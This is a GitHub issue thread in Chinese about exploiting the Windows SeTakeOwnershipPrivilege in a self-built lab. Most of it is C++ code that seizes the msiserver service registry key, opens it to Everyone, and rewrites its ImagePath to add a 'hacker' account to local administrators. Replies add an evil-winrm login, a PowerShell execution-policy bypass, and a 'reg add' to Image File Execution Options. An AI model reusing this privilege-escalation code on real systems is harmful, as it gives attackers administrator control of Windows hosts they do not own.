SeTakeOwnershipPrivilege的利用 #8

zusda · 2022-05-09T09:11:43Z

SeTakeOwnershipPrivilege的利用能写出来看下吗，我利用了restore代码在自己搭建的靶机中利用，总是报错拒绝访问。

// takeOwnerShip2.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <Windows.h>
#include <winternl.h>
#include <Windows.h>
#include <sddl.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <string>
#include <tchar.h>
#include <AclAPI.h>
#include<iostream>

PVOID
GetInfoFromToken(HANDLE current_token, TOKEN_INFORMATION_CLASS tic)
{
	DWORD n;
	PVOID data;

	if (!GetTokenInformation(current_token, tic, 0, 0, &n) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
		return 0;

	data = (PVOID)malloc(n);

	if (GetTokenInformation(current_token, tic, data, n, &n))
		return data;
	else
		free(data);

	return 0;
}

int main()
{
	wchar_t infile[] = L"MACHINE\\SYSTEM\\CurrentControlSet\\Services\\msiserver";
	HANDLE current_token;
	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &current_token);
	PTOKEN_USER user = (PTOKEN_USER)GetInfoFromToken(current_token, TokenUser);
	PSID UserSid = (LPTSTR)user->User.Sid;
	DWORD dwRes = SetNamedSecurityInfoW(infile, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, UserSid, NULL, NULL, NULL);

	PSID pSIDEveryone = NULL;
	PACL pACL;
	SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
	AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pSIDEveryone);
	EXPLICIT_ACCESS ea[1];
	ea[0].grfAccessPermissions = KEY_ALL_ACCESS;
	ea[0].grfAccessMode = SET_ACCESS;
	ea[0].grfInheritance = NO_INHERITANCE;
	ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
	ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
	ea[0].Trustee.ptstrName = (LPTSTR)pSIDEveryone;
	SetEntriesInAcl(1, ea, NULL, &pACL);


	//wchar_t infile[] = L"SYSTEM\\CurrentControlSet\\Services\\msiserver";
	dwRes = SetNamedSecurityInfoW(infile, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL);
	if (dwRes != ERROR_SUCCESS)
		printf("[-] Failed to set owner: %d\n", dwRes);
	else
		printf("[!] Success!\n");


	HKEY hKey;
	LONG lResult;
	lResult = RegCreateKeyExA(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\msiserver",
		0,
		NULL,
		REG_OPTION_BACKUP_RESTORE,
		KEY_SET_VALUE,
		NULL,
		&hKey,
		NULL);
	std::cout << "RegCreateKeyExA result: " << lResult << std::endl;
	if (lResult != 0) {
		exit(0);
	}

	//HKEY hk = HKEY("SYSTEM\\CurrentControlSet\\Services\\msiserver");
	std::string buffer = "cmd.exe /c net localgroup administrators hacker /add";
	LONG stat = RegSetValueExA(hKey, "ImagePath", 0,
		REG_EXPAND_SZ,
		(const BYTE*)buffer.c_str(),
		buffer.length() + 1);
	std::cout << "RegSetValueExA result: " << stat << std::endl;
	if (stat != 0) {
		exit(0);
	}
}

The text was updated successfully, but these errors were encountered:

3gstudent · 2022-05-16T01:09:20Z

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp

你的环境下，这个可以用吗

zusda · 2022-05-16T09:06:40Z

能用，但作用仅仅是获取了注册表某条目的权限，我后面添加了serestore的利用代码(你发的代码中的// exploit it via restore注释部分)，但是报错，说没有权限访问，但我手动操作确实是获得权限了的。后来我自己利用部分这，用了windows自带的reg.exe。成功修改注册表的条目内容了。我是win10环境配置命令： powershell -ep bypass Import-Module carbon Grant-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege Test-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege 然后用winrm登录 evil-winrm -i 10.254.1.102 -u aarti -p "123"

…

------------------ 原始邮件 ------------------ 发件人: "3gstudent/Homework-of-C-Language" ***@***.***>; 发送时间: 2022年5月16日(星期一) 上午9:09 ***@***.***>; ***@***.******@***.***>; 主题: Re: [3gstudent/Homework-of-C-Language] SeTakeOwnershipPrivilege的利用 (Issue #8) https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp 你的环境下，这个可以用吗 — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: ***@***.***>

3gstudent · 2022-05-17T07:05:11Z

我可以这么理解吗：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp
这个代码可以生效，然后能够以低权限执行reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v takeownership /t REG_SZ /d "C:\\Windows\\System32\\calc.exe"

你想在.cpp中实现reg add的操作，但是失败了？

zusda · 2022-10-11T07:42:47Z

是的

…

---原始邮件--- 发件人: ***@***.***> 发送时间: 2022年5月17日(周二) 下午3:05 收件人: ***@***.***>; 抄送: ***@***.******@***.***>; 主题: Re: [3gstudent/Homework-of-C-Language] SeTakeOwnershipPrivilege的利用 (Issue #8) 我可以这么理解吗： https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp 这个代码可以生效，然后能够以低权限执行reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v takeownership /t REG_SZ /d "C:\\Windows\\System32\\calc.exe" 你想在.cpp中实现reg add的操作，但是失败了？ — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: ***@***.***>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SeTakeOwnershipPrivilege的利用 #8

SeTakeOwnershipPrivilege的利用 #8

zusda commented May 9, 2022

3gstudent commented May 16, 2022

zusda commented May 16, 2022 via email

3gstudent commented May 17, 2022

zusda commented Oct 11, 2022 via email

SeTakeOwnershipPrivilege的利用 #8

SeTakeOwnershipPrivilege的利用 #8

Comments

zusda commented May 9, 2022

3gstudent commented May 16, 2022

zusda commented May 16, 2022 via email

3gstudent commented May 17, 2022

zusda commented Oct 11, 2022 via email